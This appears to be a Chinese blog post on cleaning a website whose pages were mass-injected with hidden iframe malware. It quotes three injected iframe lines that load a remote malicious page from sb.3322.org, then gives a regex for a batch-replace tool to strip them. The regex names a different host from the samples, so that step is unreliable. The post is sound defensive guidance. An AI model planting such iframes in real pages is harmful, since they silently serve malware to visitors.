网站被批量挂马是经常遇到的事情, 一般用批量替换工具很方便就可以批量删除相关代码, 但是如果一个网站里面每个页面都被放置了木马, 而且代码还都不一样。 这种情况如何处理?
因为没有一个页面挂的马是相同的, 所以根本删不掉。 前几天我的一个朋友就遇到了这个问题。
他诉苦道服务器上一个网站被批量挂了木马, 仔细一看居然每个页面挂的木马都不一样。
我检查了一下是类似这样的情况:
页面一的木马是:
<ifraME src=http://sb.3322.org/isme.asp widTH=50 height=0 name=5148 naMe=2 boRdeR=0></ifRame>
页面二的木马是:
<ifraME src=http://sb.3322.org/isme.asp widTH=50 height=0 name=2133 naMe=2 boRdeR=0></ifRame>
页面三的木马是:
<ifraME src=http://sb.3322.org/isme.asp widTH=50 height=0 name=4583 naMe=2 boRdeR=0></ifRame>
……
仔细看, 虽然每个页面上挂的木马不同, 但是还是有一定规律的。
这时候, 我就在郁闷了, 要是能有一个支持正则的批量替换工具就好了。 还好补天的areone帮忙, 给我介绍了一个小工具, 恰恰可以满足这个要求。
这里有下载:
http://www.butian.org/soft/731.html
打开AFR工具, 选择批量替换:
搜索内容部分填写:
<ifraME src=http://88lai.3322.org/u.asp widTH=50 height=0 name=\d{4} naMe=2 boRdeR=0></ifRame>
替换为空 即可。
注意上面语句中红色部分, 就是正则表达式了。 通过这种方法, 就可以批量对木马进行删除了。
很快, 清除了4百多个页面上的木马。 大功告成。
正则表达式在平时技术方面的应用中用的很多, 后面我也会给大家找一些这方面的教材。
……